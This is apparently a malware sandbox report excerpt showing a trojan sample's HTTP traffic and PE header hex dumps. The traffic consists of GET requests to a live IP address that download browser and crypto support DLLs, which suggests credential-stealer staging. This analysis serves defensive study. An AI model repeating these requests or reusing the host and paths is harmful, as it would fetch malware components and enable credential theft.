Mar 29, 2024 14:23:55.056355000 CET	1286	IN	Data Raw: 1e 14 83 e0 10 83 e1 eb 09 c1 89 4c 1a 14 8b 44 1e 18 89 44 1a 18 8b 45 d4 40 83 c3 14 3b 06 8b 4d ec 0f 8c 6a ff ff ff e9 28 fe ff ff 57 e8 2d d3 19 00 83 c4 04 89 c2 42 8b 4d ec 85 c9 89 7d e4 89 55 d8 0f 84 32 01 00 00 8b 45 dc 0f b7 00 39 c2 Data Ascii: LDDE@;Mj(W-BM}U2E9w"wpPt\P83(yS<jU%uuWULu6HuDu<@Hy
Mar 29, 2024 14:24:48.857212067 CET	191	OUT	GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1 Content-Type: text/plain; User-Agent: MrBidenNeverKnow Host: 89.238.170.230 Connection: Keep-Alive Cache-Control: no-cache
Mar 29, 2024 14:24:49.132572889 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 29 Mar 2024 13:24:49 GMT Content-Type: application/octet-stream Content-Length: 449280 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 19:39:42 GMT ETag: "625483fe-6db00" Expires: Fri, 29 Mar 2024 13:54:49 GMT Cache-Control: max-age=1800 Cache-Control: public Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL(["!(`@@Agr?=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Mar 29, 2024 14:24:56.823652029 CET	195	OUT	GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1 Content-Type: text/plain; User-Agent: MrBidenNeverKnow Host: 89.238.170.230 Connection: Keep-Alive Cache-Control: no-cache
Mar 29, 2024 14:24:57.075452089 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 29 Mar 2024 13:24:56 GMT Content-Type: application/octet-stream Content-Length: 80128 Connection: keep-alive Last-Modified: Sat, 28 May 2022 21:52:46 GMT ETag: "629299ae-13900" Expires: Fri, 29 Mar 2024 13:54:56 GMT Cache-Control: max-age=1800 Cache-Control: public Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL(["!0t(@A? 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Mar 29, 2024 14:24:58.200717926 CET	190	OUT	GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1 Content-Type: text/plain; User-Agent: MrBidenNeverKnow Host: 89.238.170.230 Connection: Keep-Alive Cache-Control: no-cache
Mar 29, 2024 14:24:58.477586985 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 29 Mar 2024 13:24:58 GMT Content-Type: application/octet-stream Content-Length: 627128 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 19:39:36 GMT ETag: "625483f8-991b8" Expires: Fri, 29 Mar 2024 13:54:58 GMT Cache-Control: max-age=1800 Cache-Control: public Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL9b"!V/@AcQ,pr4CWh0.text `.rdata0@@.data0@.00cfgP @@.tls`"@.rsrcp$@@.reloc4CD.@B
Mar 29, 2024 14:25:12.906919003 CET	190	OUT	GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1 Content-Type: text/plain; User-Agent: MrBidenNeverKnow Host: 89.238.170.230 Connection: Keep-Alive Cache-Control: no-cache
Mar 29, 2024 14:25:13.189029932 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 29 Mar 2024 13:25:13 GMT Content-Type: application/octet-stream Content-Length: 684984 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 19:40:08 GMT ETag: "62548418-a73b8" Expires: Fri, 29 Mar 2024 13:55:13 GMT Cache-Control: max-age=1800 Cache-Control: public Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL&9b"!6@A4,S,xT8$&0.D.text `.rdata0@@.data<F@&@.00cfg(@@.rsrcx*@@.reloc8$&.@B
Mar 29, 2024 14:25:30.995368004 CET	191	OUT	GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1 Content-Type: text/plain; User-Agent: MrBidenNeverKnow Host: 89.238.170.230 Connection: Keep-Alive Cache-Control: no-cache
Mar 29, 2024 14:25:31.263928890 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 29 Mar 2024 13:25:31 GMT Content-Type: application/octet-stream Content-Length: 254392 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 19:39:58 GMT ETag: "6254840e-3e1b8" Expires: Fri, 29 Mar 2024 13:55:31 GMT Cache-Control: max-age=1800 Cache-Control: public Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL'9b"!@AtvSw5hqD{.textV `.rdata@@.data~@.00cfg@@.rsrc@@.reloc56@B
Mar 29, 2024 14:25:35.435950041 CET	190	OUT	GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1 Content-Type: text/plain; User-Agent: MrBidenNeverKnow Host: 89.238.170.230 Connection: Keep-Alive Cache-Control: no-cache
Mar 29, 2024 14:25:35.690963030 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 29 Mar 2024 13:25:35 GMT Content-Type: application/octet-stream Content-Length: 1099223 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 17:28:56 GMT ETag: "62546558-10c5d7" Expires: Fri, 29 Mar 2024 13:55:35 GMT Cache-Control: max-age=1800 Cache-Control: public Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 70 0e 00 00 2e 00 00 00 f8 0d 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL",bv! a n* ;.text`P`.data\|' (@`.rdataDPF:@`@.bss(`.edatan*,@0@.idata@0.CRT,@0.tls @0.rsrc@0.reloc; <@0B/48`@@B/19Rp@B/31]'@(@B/45-p.

Target ID:	0
Start time:	14:23:51
Start date:	29/03/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe
Wow64 process (32bit):	true
